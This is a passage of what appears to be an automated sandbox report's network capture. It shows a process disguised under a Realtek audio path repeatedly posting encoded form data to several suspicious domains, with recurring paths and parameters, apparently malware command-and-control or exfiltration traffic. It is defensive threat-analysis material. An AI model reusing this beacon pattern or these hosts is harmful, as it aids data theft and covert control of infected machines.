                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.809627056 CET820INData Raw: 6f 2e 63 6f 6d 2f 63 68 65 63 6b 64 6f 6d 61 69 6e 6f 66 66 65 72 2e 70 68 70 3f 6c 61 6e 67 75 61 67 65 3d 65 73 26 64 6f 6d 61 69 6e 3d 64 69 61 6c 6f 67 70 72 69 65 73 74 2e 6f 6e 6c 69 6e 65 26 70 61 72 74 6e 65 72 69 64 3d 33 31 38 38 37 36
                                                                                                                                                                                                                                Data Ascii: o.com/checkdomainoffer.php?language=es&domain=dialogpriest.online&partnerid=318876">venta</a> y est alojado en <a href="http://www.wesped.com/" target="_top" alt="Web Hosting y dominios">Wesped</a></p> <p>Compra <a href="https://www.w


Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
50          192.168.11.20  49809        176.31.209.107   80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp                           Bytes transferred  Direction  Data
Dec 3, 2024 14:54:42.836472988 CET  721                OUT        POST /7znk/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.dialogpriest.online
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.dialogpriest.online
                                                                                                                                                                                                                                Referer: http://www.dialogpriest.online/7znk/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 4b 51 6c 75 4e 30 2b 62 4a 62 2b 5a 75 6d 68 51 72 77 66 4e 49 48 57 48 5a 34 57 6d 49 55 4a 6d 45 44 6f 6a 6b 73 54 57 2b 76 39 57 68 31 66 45 56 48 6e 7a 69 50 51 63 53 37 7a 4f 34 79 55 4c 63 54 74 72 4e 5a 35 7a 44 54 61 6d 32 67 65 56 55 42 51 68 31 46 56 73 4b 5a 78 37 58 78 7a 4e 58 44 47 52 51 72 33 37 31 66 47 51 6b 47 77 4a 6e 56 66 67 56 70 70 2f 55 39 38 53 50 4e 76 77 4f 34 4e 4f 57 63 2f 6e 44 42 47 71 2f 39 67 69 49 45 62 54 53 43 73 2f 43 58 69 37 73 46 7a 54 69 54 4a 51 6b 37 65 50 51 2f 38 41 36 36 30 71 6a 63 33 4c 45 76 45 31 32 74 63 7a 47 76 70 70 6c 75 35 58 6f 76 75 50 5a 6a 38 63 37 4e 50 53 6f 59 34 7a 36 73 34 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=KQluN0+bJb+ZumhQrwfNIHWHZ4WmIUJmEDojksTW+v9Wh1fEVHnziPQcS7zO4yULcTtrNZ5zDTam2geVUBQh1FVsKZx7XxzNXDGRQr371fGQkGwJnVfgVpp/U98SPNvwO4NOWc/nDBGq/9giIEbTSCs/CXi7sFzTiTJQk7ePQ/8A660qjc3LEvE12tczGvpplu5XovuPZj8c7NPSoY4z6s4=
Dec 3, 2024 14:54:43.031315088 CET  1289               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:42 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Ascii: 761<!DOCTYPE html><html> <head> <meta charset="utf-8"><title>www.dialogpriest.online</title> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> <center><p>El dominio <a href="http://dialo [TRUNCATED]
Dec 3, 2024 14:54:43.031544924 CET | 820 | IN
                                                                                                                                                                                                                                Data Ascii: o.com/checkdomainoffer.php?language=es&domain=dialogpriest.online&partnerid=318876">venta</a> y est alojado en <a href="http://www.wesped.com/" target="_top" alt="Web Hosting y dominios">Wesped</a></p> <p>Compra <a href="https://www.w


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.11.20 | 49810 | 176.31.209.107 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:45.554203987 CET | 2578 | OUT | POST /7znk/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.dialogpriest.online
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.dialogpriest.online
                                                                                                                                                                                                                                Referer: http://www.dialogpriest.online/7znk/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=KQluN0+bJb+ZumhQrwfNIHWHZ4WmIUJmEDojksTW+v1WhHnEUgzzjPQcR7zL4yUscT0gNZ0GDVem2CmVSyIhvVVsIZx6KhyZXDWrQrn71fGQkD0JukfgaJpwV98eFtuXO4V0Wc6QE1yq/dwiKXzTdCs9HXjusFv2iTVqk77HQ8cA48hq+Nv8bewD2MgYHd54r9ovueaTZ1w8lunE0JQRusYb4HBHI/HuPCQlF97oe0kDk1o3cIsdv/n0JIRG5Z9YjXBDkimsqjjrvtH8gyLIIpUkOAAoS+nRDymxlz/nX849c3Fxhlc64Uao78C9KvXK6QsoZUQY6LzxMMQijtX9hT4Dabj0+yXPu5qA6wb2D9raBrEHQTdRmJu0DulYwXkyQrNSgaML/M9PVVf0u7MFtiA6w4jq1/A93iN7L8/uuF7ULUiybgC5fHdqOTzOfnCDudwDmzEdLJlFPBIvPzMcYcId7YeGpd1w5xFJh1lZ6Fe9QIsQPLDWnhtYmoouJ/fSY3FzL9mKku4XdD9EfWu8z3es54v0uhGjWRPb+1GG2CovH8YG5B7m0IYPg165ilIwlRNg/lKJih8iHLh0IWSWEIe/dzX9crAHRsejrpRKP6QiAgROThdfepOQ7KRQwZAfUSUmq77RHXOpOrv4vON4bgBkV+/pTEVJ9liZ2fw1kapYwS0CBKHGGGfx8Hq7OJj4HjjLkaWNA4DgHlDjOT/PD9L2/5niGgCUrDb2Euz+C2EwO6Bh36ExkuDauXTGKSShiBg8J9msi/n2tKjmElqfOcRpMWzcNpVQTYINMr6ue7bJI22VwoSVBHc3JPlhYRdgY4fAZ0f+XIaHv7S7jemisr4CXoe03+ZMh7oSk/cWFoXHXt2K3w3zkVGTSoceurIKCFVNzhd/LO/lc5pQQyqVB7pgavMqJMTwsK1d5AGP7AhRLQ3bCYH3DKxLvdohY2RdRZefm2+6dWaUNA4dfJ+CsBcfYd393TxpdkJYRJ8IMtghS [TRUNCATED]
Dec 3, 2024 14:54:45.554270029 CET | 5292 | OUT
                                                                                                                                                                                                                                Data Ascii: ojsoKTgSI6UAR89Tc1p0fTcHN6FIGIShE1uJ9t6xz1ecVlWtsboMyYrzEXhfLTvHwbY5vhsfOWdrKDpFLXyBdl5XWurngWjPxyJTbhACD3gfGVYOtitXR/pGaND9tTfEdoSLcq68aneGeCcPVNBF5hcgeoZqWUWU874Ovj2rNhdeQphCUpFu5ZwqlGonBBGSmFpuQK3aTZL7ulyz5Opr0bYUFVvyeSqFiSIhHixQQStEvYbnzja
Dec 3, 2024 14:54:45.758339882 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:45 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Ascii: 761<!DOCTYPE html><html> <head> <meta charset="utf-8"><title>www.dialogpriest.online</title> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> <center><p>El dominio <a href="http://dialo [TRUNCATED]
Dec 3, 2024 14:54:45.758408070 CET | 820 | IN
                                                                                                                                                                                                                                Data Ascii: o.com/checkdomainoffer.php?language=es&domain=dialogpriest.online&partnerid=318876">venta</a> y est alojado en <a href="http://www.wesped.com/" target="_top" alt="Web Hosting y dominios">Wesped</a></p> <p>Compra <a href="https://www.w


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.11.20 | 49811 | 176.31.209.107 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:48.270658016 CET | 426 | OUT | GET /7znk/?Z1EO=OvfHeluUy&pluxVm=HSNOOCSycaWbpWp1pFuTHgyNeMyGT259cyc1jurPotVrvnXLICbtqfVvbaWKwlIlASBzdIxRFAa/wDiZdCYNsQsDHbsFXQKeKhShRpSMwKmQ7kRuiU3WeuA= HTTP/1.1
                                                                                                                                                                                                                                Host: www.dialogpriest.online
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:54:48.464325905 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:47 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Ascii: 761<!DOCTYPE html><html> <head> <meta charset="utf-8"><title>www.dialogpriest.online</title> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> <center><p>El dominio <a href="http://dialo [TRUNCATED]
Dec 3, 2024 14:54:48.464380026 CET | 820 | IN
                                                                                                                                                                                                                                Data Ascii: o.com/checkdomainoffer.php?language=es&domain=dialogpriest.online&partnerid=318876">venta</a> y est alojado en <a href="http://www.wesped.com/" target="_top" alt="Web Hosting y dominios">Wesped</a></p> <p>Compra <a href="https://www.w


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.11.20 | 49812 | 45.197.47.177 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:54.389543056 CET | 674 | OUT | POST /8orf/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.224466.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.224466.top
                                                                                                                                                                                                                                Referer: http://www.224466.top/8orf/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=/B4c+2TpaCBbDWkg6oKu8xIbjp3SinWYMmEATUIEv1IvZRp1dSiq8P/n6PM9NkNVqNtSxkPJDq2ZTWmPKc94VOxPc6rDKScG+nG61uBW/6ZOPLcfK26xAr1PrhbtoK+yfhyAlBkufx/y5UFtu7n65rwLfn0ierFtgHYIHbfan5iO4bS4xjwaU/X3FK51RwD82w==
Dec 3, 2024 14:54:54.702064991 CET | 536 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:54 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                ETag: W/"6735d5d4-11e4a"
                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.11.20 | 49813 | 45.197.47.177 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:57.240030050 CET | 694 | OUT | POST /8orf/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.224466.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.224466.top
                                                                                                                                                                                                                                Referer: http://www.224466.top/8orf/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:54:57.556756973 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:57 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                ETag: W/"6735d5d4-11e4a"
                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.11.20 | 49814 | 45.197.47.177 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:55:00.080641031 CET | 1289 | OUT | POST /8orf/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.224466.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.224466.top
                                                                                                                                                                                                                                Referer: http://www.224466.top/8orf/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:55:00.395240068 CET | 536 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 Dec 2024 13:55:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"6735d5d4-11e4a"
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.11.20 | 49815 | 45.197.47.177 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:55:02.925647974 CET | 417 | OUT | GET /8orf/?pluxVm=yDQ89DLfYgJiEyke7+6q5gE87/fs/XemaXtjJXohmXUOdwNzAwGJy6nqls5iDTVnp9Zi+kacGLaYAX6Ad+cHYYESeoueNmRKrwXa18136rVeVa07ORWAOLw=&Z1EO=OvfHeluUy HTTP/1.1
Host: www.224466.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:55:03.241132975 CET | 1289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 Dec 2024 13:55:03 GMT
Content-Type: text/html
Content-Length: 73290
Connection: close
Vary: Accept-Encoding
ETag: "6735d5d4-11e4a"


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                57192.168.11.2049816172.96.191.39807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.290703058 CET416OUTGET /oz0e/?pluxVm=N0iBPOr2h1wf3hrk0fV7bCYuQaQcnemlKlX+67l0LxDwIz/NET6JyzgCPnJBSBJZztg4pX1Iwr0Nd76JZuhGak0dZt9NjSAeSo6fySf0UlwbimsbHDdeRZs=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.88rtp.biz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:55:12.634779930 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                content-length: 796
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:55:12 GMT
                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.11.20 | 49817 | 217.160.0.183 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:55:17.843333006 CET | 671 | OUT | POST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=00x6Nc1OHcgHR9Es6IIGn0nrWZJtp3Bb7Xkibd9ZhydGkyfqQiSksgNOiAkw1XST/BAI4IBgN1IX4pRQ48tjFbj0WMl/Yd+n0Hr2wkE4p5H/GEPgMiktbLcVFTKnKkktavredqJtCD9GmYMzWsteZ6G9g7+G/Nmt3TedFyftTWN0BV/QXnWkKql0OYTPkSmOEg==
Dec 3, 2024 14:55:18.049494982 CET | 558 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:17 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.11.20 | 49818 | 217.160.0.183 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:55:20.559739113 CET | 691 | OUT | POST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=00x6Nc1OHcgHXcUs2LQG3knqKpJt+nBf7XYibc5zhHtGkTvqWTSklwNOsgk173SY/B8+4J9gN1MX4ohQ4PVgELj2O8lxFN+n0Hr2wkQSp5v/GVfgPDksF7cKUTKnbUkpavrgdvpDCGhGmZ8zW4ZdQ6H0/r/55PWlxyKgDArRKHBuNjyKKViAJ55GKoqnmQnVZpc9B5l/ZkveqDm0WivP+p4=
Dec 3, 2024 14:55:20.759258032 CET | 558 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:20 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.11.20 | 49819 | 217.160.0.183 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:55:23.278038025 CET | 2578 | OUT | POST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:55:23.278063059 CET | 5156 | OUT
                                                                                                                                                                                                                                Data Ascii: iA0xarbQBHqhB7159R6my/a5TgEstveefNxRq1FV73VHAIYShzUn4EpIyx0E8438IDV435jZ6/3FmnsBZw+5p9U9FzTu5NphdrsMemEZRnUazUcCNzCxjwebvB58V/lmiUOyTy5Ed2qIEJdYEGij7TzRV/svsX1hphTzYUDz2WPriYzu0T74DPEv8DS7gHhL1lKbaz0CIC3zvAe9LvyBMtb9LC29NG4xsGquHIeJMNzkDBMgZT+
Dec 3, 2024 14:55:23.278135061 CET | 106 | OUT
                                                                                                                                                                                                                                Data Ascii: BAr5IOwTYsY6H80hx/Nw0iM5xz0BDcsXZ3et60jku97IJFoDF9VrXCmZXBrb6DCPWKOUF+fVMBsMIGmMmsQNUhzXX01mYz4PVJT4Q1ZA==
Dec 3, 2024 14:55:23.500036001 CET | 558 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:23 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
61          192.168.11.20  49820        217.160.0.183   80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp  Bytes transferred  Direction  Data
Dec 3, 2024 14:55:25.995148897 CET  416  OUT  GET /o5mm/?pluxVm=52ZaOoJJHsYFYpcE8OJe6kaaR+Ibp2Nxq28CYNd7tHRxqCukViCUoHxjhmN2/g+W5SkTzZJsaEIA3pVY9O1vDv+SN/8yFpfSlnbOuEouoKz6AG71fS9yZK8=&Z1EO=OvfHeluUy HTTP/1.1
Host: www.kubex.dev
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:55:26.190704107 CET  745  IN  HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 601
Connection: close
Date: Tue, 03 Dec 2024 13:55:26 GMT
Server: Apache
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
62          192.168.11.20  49821        84.32.84.32     80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp  Bytes transferred  Direction  Data
Dec 3, 2024 14:55:31.410336018 CET  677  OUT  POST /073p/ HTTP/1.1
Host: www.sido247.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Origin: http://www.sido247.pro
Referer: http://www.sido247.pro/073p/
Content-Length: 203
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
